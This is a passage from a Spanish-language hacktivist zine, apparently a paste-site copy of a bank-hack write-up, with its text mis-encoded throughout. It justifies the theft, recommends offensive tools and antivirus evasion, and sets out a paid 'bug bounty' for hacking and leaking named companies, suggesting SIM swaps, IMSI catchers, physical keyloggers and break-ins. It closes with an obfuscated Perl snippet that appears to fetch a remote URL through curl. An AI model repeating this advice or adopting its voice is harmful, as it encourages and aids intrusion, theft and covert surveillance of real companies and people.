- lÃmite de envÃo mediante pagos rápidos, y hubiera tenido que usar NWBKGB2LXXX en
- vez. También recibieron un mensaje de error por esto. Leyeron los mensajes, lo
- investigaron, y encontraron el resto de mis transferencias.
- --[ 7 - El botÃn ]--------------------------------------------------------------
- Por lo que escribo ya se harán una noción cabal de cuáles son mis ideales y a
- qué cosas les doy mi apoyo. Pero no quisiera ver a nadie en problemas legales
- por recibir fondos expropiados, asà que ni una palabra más de para dónde se
- fue la lana. Sé que los periodistas probablemente van a querer poner algún
- número sobre cuántos dólares fueron distribuidos en este hackeo y otros
- parecidos, pero prefiero no alentar nuestro perverso hábito de medir las
- acciones nomás por su valor económico. Cualquier acción es admirable si es que
- viene desde el amor y no desde el ego. Por desgracia los de arriba, los ricos y
- poderosos, las figuras públicas, los hombres de negocios, la gente en posiciones
- "importantes", aquellos que nuestra sociedad más respeta y valora, esos se han
- colocado donde están a base de actuar más desde el ego que desde el amor. Es en
- la gente sencilla, humilde e "invisible" en quien deberÃamos fijarnos y a
- quienes deberÃamos admirar.
- --[ 8 - Criptomonedas ]---------------------------------------------------------
- Redistribuir dinero expropiado a proyectos chileros que buscan un cambio social
- positivo serÃa más fácil y seguro si esos proyectos aceptaran donaciones
- anónimas vÃa criptomonedas como monero, zcash, o al menos bitcoin. Se entiende
- que muchos de esos proyectos tengan una aversión a las criptomonedas, ya que
- se parecen más a alguna extraña distopÃa hipercapitalista que a la economÃa
- social con la que soñamos. Comparto su escepticismo, pero pienso que resultan
- útiles para permitir donaciones y transacciones anónimas, al limitar la
- vigilancia y control gubernamentales. Igual que el efectivo, cuyo uso muchos
- paÃses están tratando de limitar por la misma razón.
- --[ 9 - Powershell ]------------------------------------------------------------
- En esta operación, al igual en que en [1], hice mucho uso de powershell. Por
- entonces, powershell era super cool, podÃas hacer casi cualquier cosa que
- quisieras, sin detección de antivirus y con muy poco footprint forense. Ocurre
- que con la introducción del AMSI [2] el powershell ofensivo está de retirada.
- Hoy dÃa el C# ofensivo es lo que está de subida, con heramientas como
- [3][4][5][6]. AMSI va a llegar a .NET para la 4.8, asà que a las herramientas en
- C# probablemente todavÃa les queden un par de añitos antes de quedar anticuadas.
- Y entonces pues volveremos a usar C o C++, o tal vez Delphi vuelva a ponerse de
- moda. Las herramientas y técnicas especÃficas cambian cada pocos años, pero en
- el fondo no es tanto lo que cambia, hoy el hacking en esencia sigue siendo la
- misma cosa que era en los 90s. De hecho todos los scripts de powershell
- empleados en esta guÃa y en la anterior [1] siguen siendo perfectamente usables
- hoy dÃa, tras una pequeña ofuscación de tu propia cosecha.
- [1] https://www.exploit-db.com/papers/41914
- [2] https://medium.com/@byte_St0rm/
- adventures-in-the-wonderful-world-of-amsi-25d235eb749c
- [3] https://cobbr.io/SharpSploit.html
- [4] https://github.com/tevora-threat/SharpView
- [5] https://www.harmj0y.net/blog/redteaming/ghostpack/
- [6] https://rastamouse.me/2019/08/covenant-donut-tikitorch/
- ___________________________
- / Fo Sostyn, Fo Ordaag \
- \ Financial Sector Fuck Off /
- ---------------------------
- \
- \ ^__^
- (oo)\_______
- ( (__)\ )\/\
- _) / ||----w |
- (.)/ || ||
- `'
- --[ 10 - Torrent ]--------------------------------------------------------------
- Privacidad para los débiles, transparencia para los poderosos.
- La banca offshore provee de privacidad frente a su propio gobierno a los
- ejecutivos, a los polÃticos y a los millonarios. Exponerles puede sonar
- hipócrita por mi parte, dado que por lo general estoy a favor de la privacidad y
- en contra de la vigilancia gubernamental. Pero la ley ya estaba escrita por y
- para los ricos: protege su sistema de explotación, con algunos lÃmites (como los
- impuestos) para que la sociedad pueda funcionar y el sistema no colapse bajo el
- peso de su propia avaricia. Asà que no, no es lo mismo la privacidad para los
- poderosos, cuando les permite evadir los limites de un sistema de por sÃ
- diseñado para darles privilegios; y la privacidad para los débiles, a quienes
- protege de un sistema concebido para explotarles.
- Incluso a periodistas con la mejor de las intenciones les resulta imposible
- estudiar una cantidad tan ingente de material y saber qué va a resultar
- relevante para la gente en diferentes partes del mundo. Cuando filtré los
- archivos de Hacking Team, entregué a The Intercept una copia de los correos
- electrónicos con un mes de antelación. Encontraron un par de los 0days que
- Hacking Team estaba usando, los reportaron previamente a MS y Adobe y publicaron
- unas cuantas historias una vez que la filtración se hizo pública. No hay punto
- de comparación con la enorme cantidad de artÃculos e investigación que vino tras
- la filtración completa al público. Viéndolo asÃ, y considerando también la (no)
- publicación editorializada [1] de los papeles de panamá, pienso que una
- filtración pública y completa de este material es la elección correcta.
- [1] https://www.craigmurray.org.uk/archives/2016/04/corporate-media-gatekeepers-
- protect-western-1-from-panama-leak/
- Los psicólogos hallaron que los que están más abajo en las jerarquÃas tienden a
- comprender y a empatizar con aquellos en la cima, pero que lo contrario es menos
- común. Esto explica por qué, en este mundo sexista, muchos hombres bromean sobre
- su imposibilidad de entender a las mujeres, como si se tratara de un misterio
- irresoluble. Explica por qué los ricos, si es que se paran a pensar en quienes
- viven en la pobreza, dan unos consejos y unas "soluciones" tan ajenas a la
- realidad que dan ganas de reÃr. Explica por qué reverenciamos a los ejecutivos
- como valientes que asumen riesgos. ¿Qué es lo que arriesgan, más allá de su
- privilegio? Si todos sus emprendimientos fracasan, tendrán que vivir y trabajar
- como el resto de nosotras. También explica por qué serán muchos los que acusen
- de irresponsable y peligrosa a esta filtración sin tachaduras. Sienten el
- "peligro" sobre un banco offshore y sus clientes de forma mucho más intensa de
- lo que sienten la miseria de aquellos desposeÃdos por este sistema injusto y
- desigual. Y la filtración de sus finanzas, ¿es acaso un peligro para ellos, o
- tan sólo para su posición en lo alto de una jerarquÃa que ni siquiera deberÃa
- existir?
- ,---------------------------------------------------.
- _,-._ | Nos vilifican, esos infames; cuando la única |
- ; ___ : | diferencia es que ellos roban a los pobres |
- ,--' (. .) '--.__ | amparados por la ley, lo sabe el cielo, y nosotros|
- _; ||| \ | saqueamos a los ricos bajo la única protección de |
- '._,-----''';=.____," | nuestro propio coraje. ¿No has de preferir ser |
- /// < o> |##| | uno de nosotros, antes que pordiosear ante esos |
- (o \`--' / villanos en busca de trabajo? |
- ///\ >>>> _\ <<<< //`---------------------------------------------------'
- --._>>>>>>>><<<<<<<< /
- ___() >>>[||||]<<<<
- `--'>>>>>>>><<<<<<<
- >>>>>>><<<<<<
- >>>>><<<<<
- >>ctr<<
- Capitán Bellamy
- --[ 11 - Aprende a hackear ]----------------------------------------------------
- No se empieza hackeando bien. Empiezas hackeando mierda, pensando
- que es bueno, y luego poco a poco vas mejorando. Por eso siempre digo
- que una de las virtudes más valiosas es la persistencia.
- - Consejos de Octavia Butler para la aspirante a APT
- La mejor forma de aprender a hackear es hackeando. Armate un laboratorio con
- máquinas virtuales y empezá a probar cosas, tomándote un break para investigar
- cualquier cosa que no entiendas. Como mÃnimo vas a querer un servidor windows
- como controlador de dominio, otra vm windows normal unida al dominio, y una
- máquina de desarrollo con visual studio para compilar y modificar herramientas.
- Intenta hacer un documento de office con macros que lancen meterpreter u otro
- RAT, y probá meterpreter, mimikatz, bloodhound, kerberoasting, smb relaying,
- psexec y otras técnicas de pase lateral [1]; asà como los otros scripts,
- herramientas y técnicas mencionados en esta guÃa y en la anterior [2]. Al
- principio puedes deshabilitar windows defender, pero luego probalo todo
- teniéndolo activado [3][4] (pero desactivando el envÃo automático de muestras).
- Una vez que estés a gusto con todo eso, estarás lista para hackear el 99% de las
- compañÃas. Hay un par de cosas que en algún momento serán muy útiles en tu
- aprendizaje, como desenvolverte cómodamente con bash y cmd.exe, un dominio
- básico de powershell, python y javascript, tener conocimiento de kerberos [5][6]
- y active directory [7][8][9][10], y un inglés fluido. Un buen libro
- introductorio es The Hacker Playbook.
- Quiero también escribir un poco sobre cosas en las que no centrarse si no te
- quieres entretener sólo porque alguien te haya dicho que no eres una hacker "de
- verdad" si no sabes ensamblador. Obviamente, aprende lo que sea que te interese,
- pero escribo estas lÃneas pensando en aquellas cosas en las que te puedes
- centrar a fin de conseguir resultados prácticos si lo que buscas es hackear
- compañÃas para filtrar y expropiar. Un conocimiento básico de seguridad en
- aplicaciones web [11] es útil, pero especializarte más en seguridad web no es
- realmente el mejor uso de tu tiempo, a menos que quieras hacer una carrera en
- pentesting o cazando recompensas por bugs. Los CTFs, y la mayorÃa de los
- recursos que encontrarás al buscar información sobre hacking, se centran
- generalmente en habilidades como seguridad web, ingenierÃa inversa, desarrollo
- de exploits, etc. Cosas que tienen sentido entendiéndolas como una forma de
- preparar gente para las carreras en la industria, pero no para nuestros
- objetivos. Las agencias de inteligencia pueden darse el lujo de tener un equipo
- dedicado a lo más avanzado en fuzzing, un equipo trabajando en desarrollo de
- exploits con un güey investigando exclusivamente las nuevas técnicas de
- manipulación del montÃculo, etc. Nosotras no tenemos ni el tiempo ni los
- recursos para eso. Las dos habilidades de lejos más importantes para el hacking
- práctico son el phishing [12] y la ingenierÃa social para conseguir acceso
- inicial, y luego poder escalar y moverte por los dominios windows.
- [1] https://hausec.com/2019/08/12/offensive-lateral-movement/
- [2] https://www.exploit-db.com/papers/41914
- [3] https://blog.sevagas.com/IMG/pdf/BypassAVDynamics.pdf
- [4] https://www.trustedsec.com/blog/
- discovering-the-anti-virus-signature-and-bypassing-it/
- [5] https://www.tarlogic.com/en/blog/how-kerberos-works/
- [6] https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
- [7] https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/
- [8] https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/
- [9] https://adsecurity.org/
- [10] https://github.com/infosecn1nja/AD-Attack-Defense
- [11] https://github.com/jhaddix/tbhm
- [12] https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-
- external-engagement-through-spear-phishing/
- --[ 12 - Lecturas Recomendadas ]------------------------------------------------
- __________________________________________
- / Cuando el nivel cientÃfico de un mundo \
- | supera por mucho su nivel de solidaridad,|
- \ ese mundo se autodestruye. /
- ------------------------------------------
- \ _.---._ . .
- * \.' '. *
- * _.-~===========~-._
- . (___________________) . *
- .' \_______/ .'
- .' .'
- '
- - Ami
- Casi todo el hacking hoy dÃa se hace por hackers de sombrero negro, para su
- provecho personal; o por hackers de sombrero blanco, para el provecho de los
- accionistas (y en defensa de los bancos, compañÃas y estados que nos están
- aniquilando a nosotras y al planeta en que vivimos); y por militares y
- agencias de inteligencia, como parte de su agenda de guerra y conflictos. Viendo
- que este nuestro mundo ya está al lÃmite, he pensado que, además de estos
- consejos técnicos para aprender a hackear, debÃa incluir algunos recursos que
- han sido muy importantes para mi desarrollo y me han guiado en el uso de mis
- conocimientos de hacking.
- * Ami: El Niño de las Estrellas - Enrique Barrios
- * La AnarquÃa Funciona
- https://es.theanarchistlibrary.org/library/peter-gelderloos-la-anarquia-
- funciona
- * Viviendo Mi Vida - Emma Goldman
- * The Rise and Fall of Jeremy Hammond: Enemy of the State
- https://www.rollingstone.com/culture/culture-news/the-rise-and-fall-of-jeremy-
- hammond-enemy-of-the-state-183599/
- Este cuate y el hack de HBGary fueron una inspiración
- * DÃas de Guerra, Noches de Amor - Crimethinc
- * Momo - Michael Ende
- * Cartas a un joven poeta - Rilke
- * Dominion (Documental)
- "no podemos creer que, si no miramos, no sucederá lo que no queremos ver"
- - Tolstoy en ÐŸÐµÑ€Ð²Ð°Ñ Ñтупень
- * Bash Back!
- --[ 13 - Sanar ]----------------------------------------------------------------
- El mundo hacker tiene una alta incidencia de depresión, suicidios y ciertas
- batallas con la salud mental. No creo que sea a causa del hacking, sino por la
- clase de ambiente del que en su mayorÃa provienen los hackers. Como muchas
- hackers, crecà con escaso contacto humano: fui una niña criada por el internet.
- Tengo mis luchas con la depresión y el entumecimiento emocional. A Willie Sutton
- se le cita con frecuencia diciendo que robaba bancos porque "allà es donde está
- el dinero", pero la cita es incorrecta. Lo que realmente dijo fue:
- ¿Por qué robaba bancos? Porque lo disfrutaba. Amaba hacerlo. Estaba más
- vivo cuando estaba dentro de un banco, en pleno atraco, que en cualquier
- otro momento de mi vida. Lo disfrutaba tanto que una o dos semanas después
- ya estaba buscando la siguiente oportunidad. Pero para mà el dinero era una
- minucia, nada más.
- El hacking me ha hecho sentir viva. Comenzó como una forma de automedicar la
- depresión. Más tarde me di cuenta de que, en realidad, podÃa servir para hacer
- algo positivo. No me arrepiento para nada de la forma en que crecÃ, trajo varias
- experiencias hermosas a mi vida. Pero sabÃa que no podÃa continuar viviendo de
- esa manera. Asà que comencé a pasar más tiempo alejada de mi computadora, con
- otras personas, aprendiendo a abrirme al mundo, a sentir mis emociones, a
- conectar con los demás, a aceptar riesgos y ser vulnerable. Cosas mucho más
- difÃciles que hackear, pero a la mera hora la recompensa vale más la pena. Aún
- me supone un esfuerzo, pero aunque sea de forma lenta y tambaleante, siento que
- voy por buen camino.
- El hacking, hecho con conciencia, también puede ser lo que nos sana. Según la
- sabidurÃa maya, tenemos un don otorgado por la naturaleza, que debemos
- comprender para ponerlo al servicio de la comunidad. En [1], se explica:
- Cuando una persona no acepta su trabajo o misión empieza a padecer
- enfermedades, aparentemente incurables; aunque no llega a morir en corto
- tiempo, sino únicamente sufre, con el objetivo de despertar o tomar
- conciencia. Por eso es indispensable que una persona que ha adquirido los
- conocimientos y realiza su trabajo en las comunidades debe pagar su Toj y
- mantener una comunicación constante con el Creador y su ruwäch q’ij, pues
- necesita constantemente de la fuerza y energÃa de estos. De lo contrario,
- las enfermedades que lo hicieron reaccionar o tomar el trabajo podrÃan
- volver a causar daño.
- Si sientes que el hacking está alimentando tu aislamiento, depresión, u otros
- padecimientos, respira. Date un tiempo para conocerte y tomar conciencia. Vos
- mereces vivir feliz, con salud y plenitud.
- ________________________
- < All Cows Are Beautiful >
- ------------------------
- \
- \ ^__^
- (oo)\_______
- ( (__)\ )\/\
- _) / ||----w |
- (.)/ || ||
- `'
- [1] Ruxe’el mayab’ K’aslemäl: RaÃz y espÃritu del conocimiento maya
- https://www.url.edu.gt/publicacionesurl/FileCS.ashx?Id=41748
- --[ 14 - El Programa Hacktivista de Caza de Bugs ]------------------------------
- Me parece que hackear para conseguir y filtrar documentos de interés público es
- una de las mejores maneras en que lxs hackers pueden usar sus habilidades en
- beneficio de la sociedad. Por desgracia para nosotras las hackers, como en casi
- todo rubro, los incentivos perversos de nuestro sistema económico no coinciden
- con aquello que beneficia a la sociedad. Asà que este programa es mi intento de
- hacer posible que lxs buenxs hackers se puedan ganar la vida de forma honesta
- poniendo al descubierto material de interés público, en vez de tener que andar
- vendiendo su trabajo a las industrias de la ciberseguridad, el cibercrimen o la
- ciberguerra. Entre algunos ejemplos de compañÃas por cuyos leaks me encantarÃa
- pagar están las empresas mineras, madereras y ganaderas que saquean nuestra
- hermosa América Latina (y asesinan a las defensoras de la tierra y el territorio
- que tratan de detenerles), empresas involucradas en ataques a Rojava como
- Havelsan, Baykar Makina, o Aselsan, compañÃas de vigilancia como el grupo NSO,
- criminales de guerra y aves de rapiña como Blackwater y Halliburton, empresas
- penitenciarias privadas como GeoGroup y CoreCivic/CCA, y lobbistas corporativos
- como ALEC. Presta atención a la hora de elegir dónde investigas. Por ejemplo, es
- bien conocido que las petroleras son malvadas: se enriquecen a costa de destruir
- el planeta (y allá por los 80s las propias empresas ya sabÃan de las
- consecuencias de su actividad [1]). Pero si les hackeas directamente, tendrás
- que bucear entre una increÃble cantidad de información aburridÃsima acerca de
- sus operaciones cotidianas. Muy probablemente te va a ser mucho más fácil
- encontrar algo interesante si en cambio te enfocas en sus lobbistas [2]. Otra
- manera de seleccionar objetivos viables es leyendo historias de periodistas de
- investigación (como [3]), que son interesantes pero carecen de evidencias
- sólidas. Y eso es exactamente lo que tus hackeos pueden encontrar.
- Pagaré hasta 100 mil USD por cada filtración de este tipo, según el interés
- público e impacto del material, y el laburo requerido en el hackeo. Sobra decir
- que una filtración completa de los documentos y comunicaciones internas de
- alguna de estas empresas supondrá un beneficio para la sociedad que sobrepasa
- esos cien mil, pero no estoy tratando de enriquecer a nadie. Sólo quiero proveer
- de fondos suficientes para que las hackers puedan ganarse la vida de forma digna
- haciendo un buen trabajo. Por limitaciones de tiempo y consideraciones de
- seguridad no voy a abrir el material, ni a inspeccionarlo por mà misma, sino que
- leeré lo que la prensa diga al respecto una vez se haya publicado, y haré una
- estimación del interés público a partir de ahÃ. Mi información de contacto está
- al final de la guÃa mencionada antes [4].
- Cómo obtengas el material es cosa tuya. Puedes usar las técnicas tradicionales
- de hacking esbozadas en esta guÃa y la anterior [4]. PodrÃas hacerle una sim
- swap [5] a un empresario o politiquero corrupto, y luego descargar sus correos y
- backups desde la nube. Puedes pedir un IMSI catcher de alibaba y usarlo afuera
- de sus oficinas. Puedes hacer un poco de war-driving (del antiguo o del nuevo
- [6]). Puede que seas una persona dentro de sus organizaciones que ya tiene
- acceso. Puedes optar por un estilo low-tech tipo old-school como en [7] y [8], y
- sencillamente colarte en sus oficinas. Lo que sea que te funcione.
- [1] https://www.theguardian.com/environment/climate-consensus-97-per-cent/2018/
- sep/19/shell-and-exxons-secret-1980s-climate-change-warnings
- [2] https://theintercept.com/2019/08/19/oil-lobby-pipeline-protests/
- [3] https://www.bloomberg.com/features/2016-como-manipular-una-eleccion/
- [4] https://www.exploit-db.com/papers/41914
- [5] https://www.vice.com/en_us/article/vbqax3/
- hackers-sim-swapping-steal-phone-numbers-instagram-bitcoin
- [6] https://blog.rapid7.com/2019/09/05/this-one-time-on-a-pen-test-your-mouse-
- is-my-keyboard/
- [7] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
- [8] https://en.wikipedia.org/wiki/Unnecessary_Fuss
- ----[ 14.1 - Pagos parciales ]--------------------------------------------------
- ¿Eres una camarera de buen corazón que trabaja en una compañÃa del mal [1]?
- ¿EstarÃas dispuesta a introducir sigilosamente un keylogger fÃsico en la
- computadora de un ejecutivo, a cambiar su cable de carga USB por uno modificado
- [2], esconder un micro en alguna sala de reuniones donde planean sus
- atrocidades, o a dejar uno de estos [3] olvidado en algún rincón de las
- oficinas?
- [1] https://en.wikipedia.org/wiki/Evil_maid_attack
- [2] http://mg.lol/blog/defcon-2019/
- [3] https://shop.hak5.org/products/lan-turtle
- ¿Eres bueno con ingenierÃa social y phishing, y conseguiste una shell en la
- computadora de un empleado, o por ahà conseguiste sus credenciales de la vpn
- usando phishing? ¿Pero quizás no pudiste conseguir admin de dominio y descargar
- lo que querÃas?
- ¿Participaste en programas de bug bounties y te convertiste en una experta en
- el hacking de aplicaciones web, pero no tienes suficiente experiencia hacker
- para penetrar completamente la compañÃa?
- ¿Tienes facilidad con la ingenierÃa inversa? Escanea algunas compañÃas del mal
- para ver qué dispositivos tienen expuestos a internet (firewall, vpn, y
- pasarelas de correo electrónico serán mucho más útiles que cosas como cámaras
- IP), aplÃcales ingenierÃa inversa y encuentra alguna vulnerabilidad explotable
- de forma remota.
- Si me es posible trabajar con vos para penetrar la compañÃa y conseguir material
- de interés público, igualmente serás recompensada por tu trabajo. Si es que no
- tengo el tiempo de trabajar en ello yo misma, al menos trataré de aconsejarte
- acerca de cómo continuar hasta que puedas completar el hackeo por tu cuenta.
- Apoyar a aquellos en el poder para hackear y vigilar a disidentes, activistas y
- a la población en general es hoy dÃa una industria de varios miles de millones
- de dólares, mientras que hackear y exponer a quienes están en el poder es un
- trabajo voluntario y arriesgado. Convertirlo en una industria de varios millones
- de dólares ciertamente no va a arreglar ese desequilibrio de poder, ni va a
- solucionar los problemas de la sociedad. Pero creo que va a ser divertido. AsÃ
- que... ¡ya quiero ver gente comenzando a cobrar sus recompensas!
- --[ 15 - Abolir las prisiones ]-------------------------------------------------
- Construidas por el enemigo pa encerrar ideas
- encerrando compañeros pa acallar gritos de guerra
- es el centro de tortura y aniquilamiento
- donde el ser humano se vuelve más violento
- es el reflejo de la sociedad, represiva y carcelaria
- sostenida y basada en lógicas autoritarias
- custodiadas reprimidos y vigilados
- miles de presas y presos son exterminados
- ante esta máquina esquizofrénica y despiadada
- compañero Axel Osorio dando la pela en la cana
- rompiendo el aislamiento y el silenciamiento
- fuego y guerra a la cárcel, vamos destruyendo!
- Rap Insurrecto - Palabras En Conflicto
- SerÃa tÃpico terminar un zine hacker diciendo liberen a hammond, liberen a
- manning, liberen a hamza, liberen a los detenidos por el montaje del дело Сети,
- etc. Voy a llevar esta tradición a su consecuencia más radical [1], y a decir:
- ¡hay que abolir las prisiones ya!. Siendo yo misma una delincuente, pueden
- pensar que lo que ocurre es que tengo una visión un poco sesgada del asunto.
- Pero en serio, es que ni siquiera es un tema controvertido, incluso la ONU está
- prácticamente de acuerdo [2]. Asà que, de una buena vez, liberen a las personas
- migrantes [3][4][5][6], encarceladas a menudo por esos mismos paÃses que crearon
- la guerra y la destrucción ambiental y económica de la que huyen. Liberen a
- todos los que están en prisión por la guerra contra quienes usan drogas [7].
- Liberen a todas las personas encarceladas por la guerra contra los pobres [8].
- Las prisiones lo único que hacen es esconder e ignorar la prueba de la
- existencia de los problemas sociales, en lugar de arreglarlos de a de veras. Y
- hasta que todxs sean liberados, lucha contra el sistema carcelario recordando y
- teniendo presentes a aquellos que están atrapados ahà dentro. EnvÃales cariño,
- cartas, helicópteros [9], radios piratas [10] y libros, y apoya a quienes se
- organizan desde ahà adentro [11][12].
- [1] http://www.bibliotecafragmentada.org/wp-content/uploads/2017/12/
- Davis-Son-obsoletas-las-prisiones-final.pdf
- [2] http://www.unodc.org/pdf/criminal_justice/Handbook_of_Basic_Principles_and_
- Promising_Practices_on_Alternatives_to_Imprisonment.pdf
- [3] https://www.theguardian.com/us-news/2016/dec/21/
- us-immigration-detention-center-christmas-santa-wish-list
- [4] https://www.theguardian.com/us-news/2016/aug/18/us-border-patrol-facility-
- images-tucson-arizona
- [5] https://www.playgroundmag.net/now/detras-Centros-Internamiento-Extranjeros-
- Espana_22648665.html
- [6] https://www.nytimes.com/2019/06/26/world/australia/
- australia-manus-suicide.html
- [7] https://en.wikiquote.org/wiki/John_Ehrlichman#Quotes
- [8] VI, 2. i. La multa impaga: https://scielo.conicyt.cl/scielo.php?script=
- sci_arttext&pid=S0718-00122012000100005
- [9] p. 10, Libelo Nº2. BoletÃn polÃtico desde la Cárcel de Alta Seguridad
- [10] https://itsgoingdown.org/transmissions-hostile-territory/
- [11] https://freealabamamovement.wordpress.com/f-a-m-pamphlet-who-we-are/
- [12] https://incarceratedworkers.org/
- --[ 16 - Conclusión ]-----------------------------------------------------------
- Nuestro mundo está patas arriba [1]. Tenemos un sistema de justicia que
- representa a la injusticia. La ley y el orden están ahà para crear una ilusión
- de paz social, y ocultar lo sistemático y profundo de la explotación, la
- violencia, y la injusticia. Mejor seguir a tu conciencia, y no a la ley.
- [1] http://resistir.info/livros/galeano_patas_arriba.pdf
- Los hombres de negocios se enriquecen maltratando a las personas y al planeta,
- mientras que el trabajo de los cuidados queda mayormente sin pagar. Mediante el
- asalto a todo lo comunal, de algún modo hemos levantado ciudades densamente
- pobladas, plagadas por la soledad y el aislamiento. El sistema cultural,
- polÃtico y económico en que vivimos alienta las peores facetas de la naturaleza
- humana: la avaricia, el egoÃsmo y egocentrismo, la competitividad, la falta de
- compasión y el apego por la autoridad. Asà que, para quien haya conseguido
- permanecer sensible y compasivo en un mundo frÃo, para todas las heroÃnas
- cotidianas que practican la bondad en las pequeñas cosas, para todas ustedes que
- aún tienen una estrella encendida en sus corazones: гоpи, гоpи ÑÑно, чтобы не
- погаÑло!
- _____________________
- < ¡Cantemos juntas! >
- ---------------------
- \
- \ ^__^
- (oo)\_______
- ( (__)\ )\/\
- _) / ||----w |
- (.)/ || ||
- Ãbrete corazón
- Ãbrete sentimiento
- Ãbrete entendimiento
- Deja a un lado la razón
- Y deja brillar el sol escondido en tu interior
- perl -Mre=eval <<\EOF
- ''
- =~(
- '(?'
- .'{'.(
- '`'|'%'
- ).("\["^
- '-').('`'|
- '!').("\`"|
- ',').'"(\\$'
- .':=`'.(('`')|
- '#').('['^'.').
- ('['^')').("\`"|
- ',').('{'^'[').'-'.('['^'(').('{'^'[').('`'|'(').('['^'/').('['^'/').(
- '['^'+').('['^'(').'://'.('`'|'%').('`'|'.').('`'|',').('`'|'!').("\`"|
- '#').('`'|'%').('['^'!').('`'|'!').('['^'+').('`'|'!').('['^"\/").(
- '`'|')').('['^'(').('['^'/').('`'|'!').'.'.('`'|'%').('['^'!')
- .('`'|',').('`'|'.').'.'.('`'|'/').('['^')').('`'|"\'").
- '.'.('`'|'-').('['^'#').'/'.('['^'(').('`'|('$')).(
- '['^'(').('`'|',').'-'.('`'|'%').('['^('(')).
- '/`)=~'.('['^'(').'|</'.('['^'+').'>|\\'
- .'\\'.('`'|'.').'|'.('`'|"'").';'.
- '\\$:=~'.('['^'(').'/<.*?>//'
- .('`'|"'").';'.('['^'+').('['^
- ')').('`'|')').('`'|'.').(('[')^
- '/').('{'^'[').'\\$:=~/('.(('{')^
- '(').('`'^'%').('{'^'#').('{'^'/')
- .('`'^'!').'.*?'.('`'^'-').('`'|'%')
- .('['^'#').("\`"| ')').('`'|'#').(
- '`'|'!').('`'| '.').('`'|'/')
- .'..)/'.('[' ^'(').'"})')
- ;$:="\."^ '~';$~='@'
- |'(';$^= ')'^'[';
- $/='`' |'.';
- $,= '('
- EOF
- Nosotras nacimos de la noche.
- en ella vivimos, hackeamos en ella.
- Aquà estamos, somos la dignidad rebelde,
- el corazón olvidado de la Интернет.
- Nuestra lucha es por la memoria y la justicia,
- y el mal gobierno se llena de criminales y asesinos.
- Nuestra lucha es por un trabajo justo y digno,
- y el mal gobierno y las corporaciones compran y venden zero days.
- Para todas el mañana.
- Para nosotras la alegre rebeldÃa de las filtraciones
- y la expropiación.
- Para todas todo.
- Para nosotras nada.
- Desde las montañas del Sureste Cibernético,
- _ _ _ ____ _ _
- | | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
- | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
- | _ | (_| | (__| < | |_) | (_| | (__| <|_|
- |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement